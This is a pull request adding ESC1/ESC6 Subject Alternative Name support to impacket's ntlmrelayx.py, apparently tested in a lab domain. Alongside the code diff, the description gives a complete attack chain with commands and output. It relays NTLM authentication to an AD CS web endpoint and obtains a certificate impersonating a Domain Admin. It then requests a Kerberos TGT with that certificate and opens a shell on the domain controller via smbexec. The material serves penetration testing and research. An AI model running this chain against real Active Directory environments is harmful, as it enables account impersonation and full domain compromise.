### PR TITLE
Support for the ADCS ESC1 and ESC6 attacks with ntlmrelayx.py

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -166,6 +166,7 @@ def start_servers(options, threads):
         c.setWebDAVOptions(options.serve_image)
         c.setIsADCSAttack(options.adcs)
         c.setADCSOptions(options.template)
+        c.setAltName(options.altname)
 
         if server is HTTPRelayServer:
             c.setListeningPort(options.http_port)
@@ -326,6 +327,7 @@ if __name__ == '__main__':
     adcsoptions = parser.add_argument_group("AD CS attack options")
     adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
     adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, default="Machine", help='AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.')
+    adcsoptions.add_argument('--altname', action='store', metavar="ALTNAME", required=False, help='Subject Alternative Name to use when performing ESC1 or ESC6 attacks.')
 
     try:
        options = parser.parse_args()

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
@@ -32,7 +32,7 @@ class ADCSAttack:
         if self.username in ELEVATED:
             LOG.info('Skipping user %s since attack was already performed' % self.username)
             return
-        csr = self.generate_csr(key, self.username)
+        csr = self.generate_csr(key, self.username, self.config.altName)
         csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
         LOG.info("CSR generated!")
 
@@ -72,9 +72,11 @@ class ADCSAttack:
 
         certificate_store = self.generate_pfx(key, certificate)
         LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
-        LOG.info("This certificate can also be used for user : {}".format(self.config.altName)
 
-    def generate_csr(self, key, CN):
+        if self.config.altName:
+            LOG.info("This certificate can also be used for user : {}".format(self.config.altName))
+
+    def generate_csr(self, key, CN, altName):
         LOG.info("Generating CSR...")
         req = crypto.X509Req()
         req.get_subject().CN = CN

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -97,6 +97,7 @@ class NTLMRelayxConfig:
         # AD CS attack options
         self.isADCSAttack = False
         self.template = None
+        self.altName = None
 
     def setSMBChallenge(self, value):
         self.SMBServerChallenge = value
@@ -218,3 +219,6 @@ class NTLMRelayxConfig:
 
     def setIsADCSAttack(self, isADCSAttack):
         self.isADCSAttack = isADCSAttack
+
+    def setAltName(self, altName):
+        self.altName = altName


### PR DESCRIPTION
I've added support for the ADCS ECS1 and ESC6 attacks to *ntlmrelayx.py*. It allows to specify a Subject Alternative Name in the CSR to impersonate a user if a template is vulnerable to ESC1 or if the *EDITF_ATTRIBUTESUBJECTALTNAME2* flag is set on the CA (ESC6).

```
[Jan 05, 2022 - 10:11:41 (CET)] adcs impacket # ntlmrelayx.py -h
[...]
AD CS attack options:
  --adcs                Enable AD CS relay attack
  --template TEMPLATE   AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.
  --altname ALTNAME     Subject Alternative Name to use when performing ESC1 or ESC6 attacks.

```


```
[Jan 05, 2022 - 10:07:55 (CET)] adcs impacket # ntlmrelayx.py -t "http://GOTHAM-ADCS.gotham.local/certsrv/certfnsh.asp" --adcs --template 'ESC1' --altname batman -smb2support -debug
[...]
[*] Servers started, waiting for connections
[*] SMBD-Thread-4: Connection from GOTHAM/ALFRED@127.0.0.1 controlled, attacking target http://GOTHAM-ADCS.gotham.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://GOTHAM-ADCS.gotham.local as GOTHAM/ALFRED SUCCEED
[*] SMBD-Thread-4: Connection from GOTHAM/ALFRED@127.0.0.1 controlled, attacking target http://GOTHAM-ADCS.gotham.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://GOTHAM-ADCS.gotham.local as GOTHAM/ALFRED SUCCEED
[*] SMBD-Thread-4: Connection from GOTHAM/ALFRED@127.0.0.1 controlled, attacking target http://GOTHAM-ADCS.gotham.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://GOTHAM-ADCS.gotham.local as GOTHAM/ALFRED SUCCEED
[*] SMBD-Thread-4: Connection from GOTHAM/ALFRED@127.0.0.1 controlled, attacking target http://GOTHAM-ADCS.gotham.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://GOTHAM-ADCS.gotham.local as GOTHAM/ALFRED SUCCEED
[*] SMBD-Thread-4: Connection from GOTHAM/ALFRED@127.0.0.1 controlled, attacking target http://GOTHAM-ADCS.gotham.local
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://GOTHAM-ADCS.gotham.local as GOTHAM/ALFRED SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE!
[*] Base64 certificate of user ALFRED: MIIRJQIBAzCCEO8GCSqGSIb3DQEHAaCCEOAEghDcMIIQ2DCCBw8GCSqGS[...]IMtB/xcZYPSK1KlBAjuxTDj5vk8rg==
[*] This certificate can also be used for user : batman
[*] Skipping user ALFRED since attack was already performed
[...]
```

The certificate can then be used to get a TGT for the impersonated user (in this example a Domain Admin):
```
[Jan 05, 2022 - 10:09:59 (CET)] adcs # gettgtpkinit.py -v -pfx-base64 'MIIRJQIBAzCCEO8GCSqGSIb3DQEHAaCCEOAEghDcMIIQ2DCCBw8GCSqGS[...]IMtB/xcZYPSK1KlBAjuxTDj5vk8rg==' -dc-ip dc.ip.dc.ip 'GOTHAM.LOCAL/batman' batman.ccache
2022-01-05 10:08:57,718 minikerberos INFO     Loading certificate and key from file
2022-01-05 10:08:57,851 minikerberos INFO     Requesting TGT
2022-01-05 10:08:57,890 minikerberos INFO     AS-REP encryption key (you might need this later):
2022-01-05 10:08:57,890 minikerberos INFO     22244a80b0765e7b2a2d0ba477fac2639f822fb01dcc98605ba22e32e648c286
2022-01-05 10:08:57,897 minikerberos INFO     Saved TGT to file

```

Which can in turn be used to compromise a DC:
```
[Jan 05, 2022 - 10:11:02 (CET)] adcs certi # smbexec.py -k -no-pass 'GOTHAM.LOCAL/batman@GOTHAM-DC.gotham.local'
Impacket v0.9.25.dev1+20220105.95856.981923da - Copyright 2021 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
```